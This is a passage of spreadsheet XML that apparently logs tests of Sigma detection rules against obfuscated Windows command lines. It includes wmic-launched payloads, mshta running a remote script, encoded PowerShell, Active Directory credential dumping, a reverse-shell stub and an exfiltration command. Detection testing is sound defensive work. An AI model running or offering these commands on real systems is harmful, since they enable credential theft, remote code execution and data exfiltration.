      <c r="G4745" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H4745" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4745" s="44" t="inlineStr">
        <is>
          <t>New Process Created Via Wmic.EXE (526be59f-a573-4eea-b5f7-f0973207634d)</t>
        </is>
      </c>
      <c r="J4745" s="44" t="n"/>
      <c r="K4745" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4746" ht="15.75" customHeight="1" s="42">
      <c r="A4746" s="44" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4746" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_process_creation</t>
        </is>
      </c>
      <c r="C4746" s="44" t="inlineStr">
        <is>
          <t>Suspicious Process Created Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D4746" s="44" t="inlineStr">
        <is>
          <t>3c89a1e8-0fba-449e-8f1b-8409d6267ec8</t>
        </is>
      </c>
      <c r="E4746" s="44" t="inlineStr">
        <is>
          <t>wmic.exe process call create "run""dll32.exe payload.dll,Start"</t>
        </is>
      </c>
      <c r="F4746" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4746" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4746" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4746" s="44" t="inlineStr">
        <is>
          <t>Suspicious Process Created Via Wmic.EXE (3c89a1e8-0fba-449e-8f1b-8409d6267ec8); New Process Created Via Wmic.EXE (526be59f-a573-4eea-b5f7-f0973207634d)</t>
        </is>
      </c>
      <c r="J4746" s="44" t="n"/>
      <c r="K4746" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4747" ht="15.75" customHeight="1" s="42">
      <c r="A4747" s="44" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4747" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_process_creation</t>
        </is>
      </c>
      <c r="C4747" s="44" t="inlineStr">
        <is>
          <t>Suspicious Process Created Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D4747" s="44" t="inlineStr">
        <is>
          <t>3c89a1e8-0fba-449e-8f1b-8409d6267ec8</t>
        </is>
      </c>
      <c r="E4747" s="44" t="inlineStr">
        <is>
          <t>wmic.exe process call create "cmd.exe  /c calc.exe"</t>
        </is>
      </c>
      <c r="F4747" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4747" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4747" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4747" s="44" t="inlineStr">
        <is>
          <t>Suspicious Process Created Via Wmic.EXE (3c89a1e8-0fba-449e-8f1b-8409d6267ec8); New Process Created Via Wmic.EXE (526be59f-a573-4eea-b5f7-f0973207634d)</t>
        </is>
      </c>
      <c r="J4747" s="44" t="n"/>
      <c r="K4747" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4748" ht="15.75" customHeight="1" s="42">
      <c r="A4748" s="44" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4748" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_process_creation</t>
        </is>
      </c>
      <c r="C4748" s="44" t="inlineStr">
        <is>
          <t>Suspicious Process Created Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D4748" s="44" t="inlineStr">
        <is>
          <t>3c89a1e8-0fba-449e-8f1b-8409d6267ec8</t>
        </is>
      </c>
      <c r="E4748" s="44" t="inlineStr">
        <is>
          <t>wmic.exe process call create "C:\Windows\System32\cmd /q /c calc.exe"</t>
        </is>
      </c>
      <c r="F4748" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4748" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4748" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4748" s="44" t="inlineStr">
        <is>
          <t>Suspicious Process Created Via Wmic.EXE (3c89a1e8-0fba-449e-8f1b-8409d6267ec8); New Process Created Via Wmic.EXE (526be59f-a573-4eea-b5f7-f0973207634d)</t>
        </is>
      </c>
      <c r="J4748" s="44" t="n"/>
      <c r="K4748" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4749" ht="15.75" customHeight="1" s="42">
      <c r="A4749" s="44" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4749" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmiprvse_susp_child_processes</t>
        </is>
      </c>
      <c r="C4749" s="44" t="inlineStr">
        <is>
          <t>Suspicious WmiPrvSE Child Process</t>
        </is>
      </c>
      <c r="D4749" s="44" t="inlineStr">
        <is>
          <t>8a582fe2-0882-4b89-a82a-da6b2dc32937</t>
        </is>
      </c>
      <c r="E4749" s="44" t="inlineStr">
        <is>
          <t>wmic process call create "cmd.exe /c ^p^o^w^e^r^s^h^e^l^l Write-Output 'test'"</t>
        </is>
      </c>
      <c r="F4749" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4749" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H4749" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4749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749" s="44" t="n"/>
      <c r="K4749" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4750" ht="15.75" customHeight="1" s="42">
      <c r="A4750" s="44" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4750" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmiprvse_susp_child_processes</t>
        </is>
      </c>
      <c r="C4750" s="44" t="inlineStr">
        <is>
          <t>Suspicious WmiPrvSE Child Process</t>
        </is>
      </c>
      <c r="D4750" s="44" t="inlineStr">
        <is>
          <t>8a582fe2-0882-4b89-a82a-da6b2dc32937</t>
        </is>
      </c>
      <c r="E4750" s="44" t="inlineStr">
        <is>
          <t>wmic process call create "cmd.exe /c p""o""w""e""r""s""h""e""l""l"</t>
        </is>
      </c>
      <c r="F4750" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4750" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H4750" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4750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750" s="44" t="n"/>
      <c r="K4750" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4751" ht="15.75" customHeight="1" s="42">
      <c r="A4751" s="44" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4751" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmiprvse_susp_child_processes</t>
        </is>
      </c>
      <c r="C4751" s="44" t="inlineStr">
        <is>
          <t>Suspicious WmiPrvSE Child Process</t>
        </is>
      </c>
      <c r="D4751" s="44" t="inlineStr">
        <is>
          <t>8a582fe2-0882-4b89-a82a-da6b2dc32937</t>
        </is>
      </c>
      <c r="E4751" s="44" t="inlineStr">
        <is>
          <t>wmic process call create "cmd.exe /c msiexec.exe /i C:\path\package.msi"</t>
        </is>
      </c>
      <c r="F4751" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4751" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H4751" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4751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4751" s="44" t="n"/>
      <c r="K4751" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4752" ht="15.75" customHeight="1" s="42">
      <c r="A4752" s="44" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B4752" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_without_parameters</t>
        </is>
      </c>
      <c r="C4752" s="44" t="inlineStr">
        <is>
          <t>Rundll32 Execution Without Parameters</t>
        </is>
      </c>
      <c r="D4752" s="44" t="inlineStr">
        <is>
          <t>5bb68627-3198-40ca-b458-49f973db8752</t>
        </is>
      </c>
      <c r="E4752" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\rundll32.exe</t>
        </is>
      </c>
      <c r="F4752" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4752" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H4752" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4752" s="44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4752" s="44" t="n"/>
      <c r="K4752" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4753" ht="15.75" customHeight="1" s="42">
      <c r="A4753" s="44" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B4753" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_without_parameters</t>
        </is>
      </c>
      <c r="C4753" s="44" t="inlineStr">
        <is>
          <t>Rundll32 Execution Without Parameters</t>
        </is>
      </c>
      <c r="D4753" s="44" t="inlineStr">
        <is>
          <t>5bb68627-3198-40ca-b458-49f973db8752</t>
        </is>
      </c>
      <c r="E4753" s="44" t="inlineStr">
        <is>
          <t>"C:\Windows\System32\rundll32".exe</t>
        </is>
      </c>
      <c r="F4753" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G4753" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4753" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4753" s="44" t="n"/>
      <c r="J4753" s="44" t="n"/>
      <c r="K4753" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4754" ht="15.75" customHeight="1" s="42">
      <c r="A4754" s="44" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B4754" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_without_parameters</t>
        </is>
      </c>
      <c r="C4754" s="44" t="inlineStr">
        <is>
          <t>Rundll32 Execution Without Parameters</t>
        </is>
      </c>
      <c r="D4754" s="44" t="inlineStr">
        <is>
          <t>5bb68627-3198-40ca-b458-49f973db8752</t>
        </is>
      </c>
      <c r="E4754" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\rundll32.exe .\</t>
        </is>
      </c>
      <c r="F4754" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4754" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H4754" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4754" s="44" t="inlineStr">
        <is>
          <t>Rundll32 Execution With Uncommon DLL Extension (c3a99af4-35a9-4668-879e-c09aeb4f2bdf)</t>
        </is>
      </c>
      <c r="J4754" s="44" t="n"/>
      <c r="K4754" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4755" ht="15.75" customHeight="1" s="42">
      <c r="A4755" s="44" t="inlineStr">
        <is>
          <t>t1218.005</t>
        </is>
      </c>
      <c r="B4755" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_mshta_http</t>
        </is>
      </c>
      <c r="C4755" s="44" t="inlineStr">
        <is>
          <t>Remotely Hosted HTA File Executed Via Mshta.EXE</t>
        </is>
      </c>
      <c r="D4755" s="44" t="inlineStr">
        <is>
          <t>b98d0db6-511d-45de-ad02-e82a98729620</t>
        </is>
      </c>
      <c r="E4755" s="44" t="inlineStr">
        <is>
          <t>mshta.exe javascript:a=(GetObject('script:HttPs://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.005/src/mshta.sct')).Exec();close();</t>
        </is>
      </c>
      <c r="F4755" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4755" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4755" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4755" s="44" t="inlineStr">
        <is>
          <t>Remotely Hosted HTA File Executed Via Mshta.EXE (b98d0db6-511d-45de-ad02-e82a98729620); Suspicious JavaScript Execution Via Mshta.EXE (67f113fa-e23d-4271-befa-30113b3e08b1)</t>
        </is>
      </c>
      <c r="J4755" s="44" t="n"/>
      <c r="K4755" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4756" ht="15.75" customHeight="1" s="42">
      <c r="A4756" s="44" t="inlineStr">
        <is>
          <t>t1218.005</t>
        </is>
      </c>
      <c r="B4756" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_mshta_http</t>
        </is>
      </c>
      <c r="C4756" s="44" t="inlineStr">
        <is>
          <t>Remotely Hosted HTA File Executed Via Mshta.EXE</t>
        </is>
      </c>
      <c r="D4756" s="44" t="inlineStr">
        <is>
          <t>b98d0db6-511d-45de-ad02-e82a98729620</t>
        </is>
      </c>
      <c r="E4756" s="44" t="inlineStr">
        <is>
          <t>mshta.exe javascript:a=(GetObject('script:https:\\raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.005/src/mshta.sct')).Exec();close();</t>
        </is>
      </c>
      <c r="F4756" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4756" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H4756" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4756" s="44" t="inlineStr">
        <is>
          <t>Suspicious JavaScript Execution Via Mshta.EXE (67f113fa-e23d-4271-befa-30113b3e08b1)</t>
        </is>
      </c>
      <c r="J4756" s="44" t="n"/>
      <c r="K4756" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4757" ht="15.75" customHeight="1" s="42">
      <c r="A4757" s="44" t="inlineStr">
        <is>
          <t>t1218.005</t>
        </is>
      </c>
      <c r="B4757" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_mshta_http</t>
        </is>
      </c>
      <c r="C4757" s="44" t="inlineStr">
        <is>
          <t>Remotely Hosted HTA File Executed Via Mshta.EXE</t>
        </is>
      </c>
      <c r="D4757" s="44" t="inlineStr">
        <is>
          <t>b98d0db6-511d-45de-ad02-e82a98729620</t>
        </is>
      </c>
      <c r="E4757" s="44" t="inlineStr">
        <is>
          <t>mshta.exe "javascript:a=(GetObject('script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.005/src/mshta.sct')).Exec();close();"</t>
        </is>
      </c>
      <c r="F4757" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4757" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4757" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4757" s="44" t="inlineStr">
        <is>
          <t>Remotely Hosted HTA File Executed Via Mshta.EXE (b98d0db6-511d-45de-ad02-e82a98729620); Suspicious JavaScript Execution Via Mshta.EXE (67f113fa-e23d-4271-befa-30113b3e08b1)</t>
        </is>
      </c>
      <c r="J4757" s="44" t="n"/>
      <c r="K4757" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4758" ht="15.75" customHeight="1" s="42">
      <c r="A4758" s="44" t="inlineStr">
        <is>
          <t>t1218.005</t>
        </is>
      </c>
      <c r="B4758" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_mshta_http</t>
        </is>
      </c>
      <c r="C4758" s="44" t="inlineStr">
        <is>
          <t>Remotely Hosted HTA File Executed Via Mshta.EXE</t>
        </is>
      </c>
      <c r="D4758" s="44" t="inlineStr">
        <is>
          <t>b98d0db6-511d-45de-ad02-e82a98729620</t>
        </is>
      </c>
      <c r="E4758" s="44" t="inlineStr">
        <is>
          <t>mshta.exe javascript:a=(GetObject('script:ht' + 'tps://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.005/src/mshta.sct')).Exec();close();</t>
        </is>
      </c>
      <c r="F4758" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4758" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H4758" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4758" s="44" t="inlineStr">
        <is>
          <t>Suspicious JavaScript Execution Via Mshta.EXE (67f113fa-e23d-4271-befa-30113b3e08b1)</t>
        </is>
      </c>
      <c r="J4758" s="44" t="n"/>
      <c r="K4758" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4759" ht="15.75" customHeight="1" s="42">
      <c r="A4759" s="44" t="inlineStr">
        <is>
          <t>t1218.005</t>
        </is>
      </c>
      <c r="B4759" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_mshta_http</t>
        </is>
      </c>
      <c r="C4759" s="44" t="inlineStr">
        <is>
          <t>Remotely Hosted HTA File Executed Via Mshta.EXE</t>
        </is>
      </c>
      <c r="D4759" s="44" t="inlineStr">
        <is>
          <t>b98d0db6-511d-45de-ad02-e82a98729620</t>
        </is>
      </c>
      <c r="E4759" s="44" t="inlineStr">
        <is>
          <t>mshta.exe javascript:a=(GetObject('script:	https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.005/src/mshta.sct')).Exec();close();</t>
        </is>
      </c>
      <c r="F4759" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4759" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4759" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4759" s="44" t="inlineStr">
        <is>
          <t>Remotely Hosted HTA File Executed Via Mshta.EXE (b98d0db6-511d-45de-ad02-e82a98729620); Suspicious JavaScript Execution Via Mshta.EXE (67f113fa-e23d-4271-befa-30113b3e08b1)</t>
        </is>
      </c>
      <c r="J4759" s="44" t="n"/>
      <c r="K4759" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4760" ht="15.75" customHeight="1" s="42">
      <c r="A4760" s="44" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4760" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_encoded_cmd</t>
        </is>
      </c>
      <c r="C4760" s="44" t="inlineStr">
        <is>
          <t>Suspicious Encoded PowerShell Command Line</t>
        </is>
      </c>
      <c r="D4760" s="44" t="inlineStr">
        <is>
          <t>ca2092a1-c273-4878-9b4b-0d60115bf5ea</t>
        </is>
      </c>
      <c r="E4760" s="44" t="inlineStr">
        <is>
          <t>powershell.exe  -e SQBFAFgA</t>
        </is>
      </c>
      <c r="F4760" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4760" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4760" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4760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760" s="44" t="n"/>
      <c r="K4760" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4761" ht="15.75" customHeight="1" s="42">
      <c r="A4761" s="44" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4761" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_encoded_cmd</t>
        </is>
      </c>
      <c r="C4761" s="44" t="inlineStr">
        <is>
          <t>Suspicious Encoded PowerShell Command Line</t>
        </is>
      </c>
      <c r="D4761" s="44" t="inlineStr">
        <is>
          <t>ca2092a1-c273-4878-9b4b-0d60115bf5ea</t>
        </is>
      </c>
      <c r="E4761" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -encodedcommand SQBFAFgA</t>
        </is>
      </c>
      <c r="F4761" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4761" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4761" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4761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4761" s="44" t="n"/>
      <c r="K4761" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4762" ht="15.75" customHeight="1" s="42">
      <c r="A4762" s="44" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4762" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_encoded_cmd</t>
        </is>
      </c>
      <c r="C4762" s="44" t="inlineStr">
        <is>
          <t>Suspicious Encoded PowerShell Command Line</t>
        </is>
      </c>
      <c r="D4762" s="44" t="inlineStr">
        <is>
          <t>ca2092a1-c273-4878-9b4b-0d60115bf5ea</t>
        </is>
      </c>
      <c r="E4762" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -e "SQBFAFgA"</t>
        </is>
      </c>
      <c r="F4762" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4762" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H4762" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4762" s="44" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J4762" s="44" t="n"/>
      <c r="K4762" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4763" ht="15.75" customHeight="1" s="42">
      <c r="A4763" s="44" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4763" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_dsinternals_cmdlets</t>
        </is>
      </c>
      <c r="C4763" s="44" t="inlineStr">
        <is>
          <t>DSInternals Suspicious PowerShell Cmdlets</t>
        </is>
      </c>
      <c r="D4763" s="44" t="inlineStr">
        <is>
          <t>43d91656-a9b2-4541-b7e2-6a9bd3a13f4e</t>
        </is>
      </c>
      <c r="E4763" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Get-ADReplAccount -All -Server ${LOGONSERVER}.TrimStart('\')"</t>
        </is>
      </c>
      <c r="F4763" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4763" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4763" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4763" s="44" t="inlineStr">
        <is>
          <t>DSInternals Suspicious PowerShell Cmdlets (43d91656-a9b2-4541-b7e2-6a9bd3a13f4e); DSInternals Suspicious PowerShell Cmdlets (43d91656-a9b2-4541-b7e2-6a9bd3a13f4e)</t>
        </is>
      </c>
      <c r="J4763" s="44" t="n"/>
      <c r="K4763" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4764" ht="15.75" customHeight="1" s="42">
      <c r="A4764" s="44" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4764" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_dsinternals_cmdlets</t>
        </is>
      </c>
      <c r="C4764" s="44" t="inlineStr">
        <is>
          <t>DSInternals Suspicious PowerShell Cmdlets</t>
        </is>
      </c>
      <c r="D4764" s="44" t="inlineStr">
        <is>
          <t>43d91656-a9b2-4541-b7e2-6a9bd3a13f4e</t>
        </is>
      </c>
      <c r="E4764" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Get-ADReplAccount -All -Server ($ENV:LOGONSERVER).TrimStart('\')"</t>
        </is>
      </c>
      <c r="F4764" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4764" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4764" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4764" s="44" t="inlineStr">
        <is>
          <t>DSInternals Suspicious PowerShell Cmdlets (43d91656-a9b2-4541-b7e2-6a9bd3a13f4e); DSInternals Suspicious PowerShell Cmdlets (43d91656-a9b2-4541-b7e2-6a9bd3a13f4e)</t>
        </is>
      </c>
      <c r="J4764" s="44" t="n"/>
      <c r="K4764" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4765" ht="15.75" customHeight="1" s="42">
      <c r="A4765" s="44" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4765" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_dsinternals_cmdlets</t>
        </is>
      </c>
      <c r="C4765" s="44" t="inlineStr">
        <is>
          <t>DSInternals Suspicious PowerShell Cmdlets</t>
        </is>
      </c>
      <c r="D4765" s="44" t="inlineStr">
        <is>
          <t>43d91656-a9b2-4541-b7e2-6a9bd3a13f4e</t>
        </is>
      </c>
      <c r="E4765" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "&amp; {Get-ADReplAccount -All -Server $ENV:LOGONSERVER.TrimStart('\')}"</t>
        </is>
      </c>
      <c r="F4765" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4765" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4765" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4765" s="44" t="inlineStr">
        <is>
          <t>DSInternals Suspicious PowerShell Cmdlets (43d91656-a9b2-4541-b7e2-6a9bd3a13f4e); DSInternals Suspicious PowerShell Cmdlets (43d91656-a9b2-4541-b7e2-6a9bd3a13f4e)</t>
        </is>
      </c>
      <c r="J4765" s="44" t="n"/>
      <c r="K4765" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4766" ht="15.75" customHeight="1" s="42">
      <c r="A4766" s="44" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4766" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_reverse_shell_connection</t>
        </is>
      </c>
      <c r="C4766" s="44" t="inlineStr">
        <is>
          <t>Potential Powershell ReverseShell Connection</t>
        </is>
      </c>
      <c r="D4766" s="44" t="inlineStr">
        <is>
          <t>edc2f8ae-2412-4dfd-b9d5-0c57727e70be</t>
        </is>
      </c>
      <c r="E4766" s="44" t="inlineStr">
        <is>
          <t>powershell -Command "&amp; {$sock = New-Object Net.Sockets.TCPClient('127.0.0.1',8080); $stream = $sock.GetStream(); [byte[]]$bytes = 0..255 | ForEach-Object {0}; $stream.Write($bytes, 0, $bytes.Length)}"</t>
        </is>
      </c>
      <c r="F4766" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4766" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4766" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4766" s="44" t="inlineStr">
        <is>
          <t>Potential Powershell ReverseShell Connection (edc2f8ae-2412-4dfd-b9d5-0c57727e70be)</t>
        </is>
      </c>
      <c r="J4766" s="44" t="n"/>
      <c r="K4766" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4767" ht="15.75" customHeight="1" s="42">
      <c r="A4767" s="44" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4767" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_reverse_shell_connection</t>
        </is>
      </c>
      <c r="C4767" s="44" t="inlineStr">
        <is>
          <t>Potential Powershell ReverseShell Connection</t>
        </is>
      </c>
      <c r="D4767" s="44" t="inlineStr">
        <is>
          <t>edc2f8ae-2412-4dfd-b9d5-0c57727e70be</t>
        </is>
      </c>
      <c r="E4767" s="44" t="inlineStr">
        <is>
          <t>pwsh -c "&amp; {$s = New-Object Net.Sockets.TCPClient; $s.Connect('127.0.0.1',8080); $stream = $s.GetStream(); $stream.Write([byte[]](0..255 | ForEach-Object {0}), 0, 256)}"</t>
        </is>
      </c>
      <c r="F4767" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G4767" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4767" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4767" s="44" t="n"/>
      <c r="J4767" s="44" t="n"/>
      <c r="K4767" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4768" ht="15.75" customHeight="1" s="42">
      <c r="A4768" s="44" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4768" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_data_exfiltration_via_cli</t>
        </is>
      </c>
      <c r="C4768" s="44" t="inlineStr">
        <is>
          <t>Potential Data Exfiltration Activity Via CommandLine Tools</t>
        </is>
      </c>
      <c r="D4768" s="44" t="inlineStr">
        <is>
          <t>7d1aaf3d-4304-425c-b7c3-162055e0b3ab</t>
        </is>
      </c>
      <c r="E4768" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$content = gc C:\Temp\test.txt; Invoke-WebRequest -Uri http://127.0.0.1 -Method POST -Body $content"</t>
        </is>
      </c>
      <c r="F4768" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4768" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H4768" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4768" s="44" t="inlineStr">
        <is>
          <t>Suspicious Invoke-WebRequest Execution (5e3cc4d8-3e68-43db-8656-eaaeefdec9cc); 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4768" s="44" t="n"/>
      <c r="K4768" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4769" ht="15.75" customHeight="1" s="42">
      <c r="A4769" s="44" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4769" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_data_exfiltration_via_cli</t>
        </is>
      </c>
      <c r="C4769" s="44" t="inlineStr">
        <is>
          <t>Potential Data Exfiltration Activity Via CommandLine Tools</t>
        </is>
      </c>
      <c r="D4769" s="44" t="inlineStr">
        <is>
          <t>7d1aaf3d-4304-425c-b7c3-162055e0b3ab</t>
        </is>
      </c>
      <c r="E4769" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$content = Get-Content C:\Temp\test.txt; Invoke-WebRequest -Ur""i http://127.0.0.1 -Me""thod POST -Body $content"</t>
        </is>
      </c>
      <c r="F4769" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4769" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4769" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4769" s="44" t="inlineStr">
        <is>
          <t>Suspicious Invoke-WebRequest Execution (5e3cc4d8-3e68-43db-8656-eaaeefdec9cc); Potential Data Exfiltration Activity Via CommandLine Tools (7d1aaf3d-4304-425c-b7c3-162055e0b3ab); Potential Data Exfiltration Activity Via CommandLine Tools (7d1aaf3d-4304-425c-b7c3-162055e0b3ab); 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4769" s="44" t="n"/>
      <c r="K4769" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4770" ht="15.75" customHeight="1" s="42">
      <c r="A4770" s="44" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4770" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_data_exfiltration_via_cli</t>
